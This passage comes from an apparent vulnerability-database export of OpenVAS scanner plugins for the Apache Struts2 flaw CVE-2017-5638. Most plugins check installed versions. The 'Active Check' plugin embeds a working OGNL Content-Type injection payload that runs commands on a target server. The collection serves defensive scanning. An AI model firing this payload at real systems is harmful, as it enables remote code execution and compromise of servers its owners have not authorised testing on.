version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n 